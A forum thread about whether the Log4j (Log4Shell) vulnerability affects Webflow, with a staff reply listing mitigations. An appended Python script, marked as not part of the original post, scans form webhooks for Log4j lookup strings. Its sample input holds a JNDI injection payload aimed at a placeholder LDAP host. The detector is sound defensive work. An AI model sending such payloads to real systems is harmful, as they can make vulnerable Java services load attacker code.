
Does the Log4j vulnerability affect Webflow?

Hello to all,

as the planet is on fire with this new vulnerability discovery, I haven’t found any communication or elements that inform me on the measures to take for us who are users of Webflow services.

One of my clients just asked me about the exposure of his website (or via his website) to the Log4Shell threat, and I am unable to answer him about the Webflow exposition, and about the conservative measures that may have been taken.

Can anyone tell me more?

I invite Webflow to make a communication to its users without delay to inform them of their exposure to the risk, and I hope, to reassure us.

Thanks in advance!


I understand that Webflow utilises NGINX web servers and therefore would not be affected by the Log4j vulnerability; however, this is only my guess as a Webflow user. I too, on behalf of concerned clients, need an official response from Webflow.

@stephane This is a great question. I’ve just sent an email to webflow partner support to know more about this. I’ll keep you posted if / when I get an answer.


Would be great to get any insight on this

I don’t have access to the internals to rule it out, but if they did run Log4s internally, it’s not available publicly as it would be firewalled off. I would not be concerned about it since it would be trivial to upgrade to mitigate any threat. Why not open a trouble ticket to see what Webflow has to say? They have been quiet in the forums lately.

Hi all! Matthew here from Webflow’s Community Team, following up regarding the Apache Log4j vulnerability issue.

Webflow’s platform is not built upon Java, nor uses Log4j directly. We are aware of the follow-up CVEs: CVE-2021-45046 and CVE-2021-45105, and have mitigated these issues. At this time, we have completed all tasks that we are able to directly mitigate, and we will continue to monitor our downstream partners.

Here are the actions Webflow has taken:

  • We have enabled Web Application Firewall (WAF) detection and blocking rules against this vector, and confirmed coverage of all server and API endpoints.
  • We have further validated our WAF rules and confirmed that our coverage is complete.
  • We have engaged vendors and downstream dependent partners to assess if they are affected, and monitor their efforts to remediate.
  • We have implemented rules within our EDR tools to monitor corporate and employee endpoints.

Here are the actions we recommend our customers take at this time:

  • We recommend that you follow AWS’s Log4j updates, as we are unable to push Amazon AWS to accelerate patching these services. We ask that you follow those updates directly instead of relying on us to relay this information.
  • If any of your sites have forms with webhooks configured, that data is sent to your webhook service provider, and may include JNDI payloads. We advise that you follow up with any service providers handling those requests and ensure they have mitigated this vector.

We hope the information shared here is helpful! Please feel free to reach out to our Customer Support Team with any additional questions, concerns, or feedback, and we’ll be happy to assist.
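
The webhook recommendation above, as an added example that is not part of the original post and is not Webflow's code: a receiver-side check that scans a form-submission webhook body for Log4j lookup syntax before the data is handed to any Java-based service. The JSON layout, field names and host are constructed for illustration.

```python
import json
import re
from urllib.parse import unquote

# Log4j 2 lookup syntax opens with "${". A form field has no reason to carry it,
# so any occurrence is flagged; a literal "jndi:" raises the severity.
LOOKUP_OPEN = re.compile(r"\$\{")
JNDI = re.compile(r"jndi\s*:", re.IGNORECASE)


def iter_strings(node, path="$"):
    """Yield (path, string) for every string key and value in a decoded JSON body."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from iter_strings(key, f"{path}.<key>")
            yield from iter_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from iter_strings(value, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node


def scan_webhook_body(raw_body):
    """Return a list of findings for one webhook request body (JSON text)."""
    findings = []
    for path, text in iter_strings(json.loads(raw_body)):
        # Percent-decode twice so singly and doubly encoded values are seen too.
        decoded = unquote(unquote(text))
        if LOOKUP_OPEN.search(decoded):
            severity = "jndi-lookup" if JNDI.search(decoded) else "lookup-syntax"
            findings.append({"field": path, "severity": severity})
    return findings


# Constructed sample submission; field names and the host are made up.
SAMPLE = json.dumps({
    "name": "Contact Form",
    "data": {
        "Name": "Jane Doe",
        "Email": "jane@example.com",
        "Message": "${jndi:ldap://placeholder.invalid/a}",
        "Company": "%24%7Bdate:yyyy%7D",
    },
})

if __name__ == "__main__":
    for finding in scan_webhook_body(SAMPLE):
        print(finding)
```

Flagged submissions can be quarantined or dropped at the receiver; the check complements patching the downstream service and does not replace it.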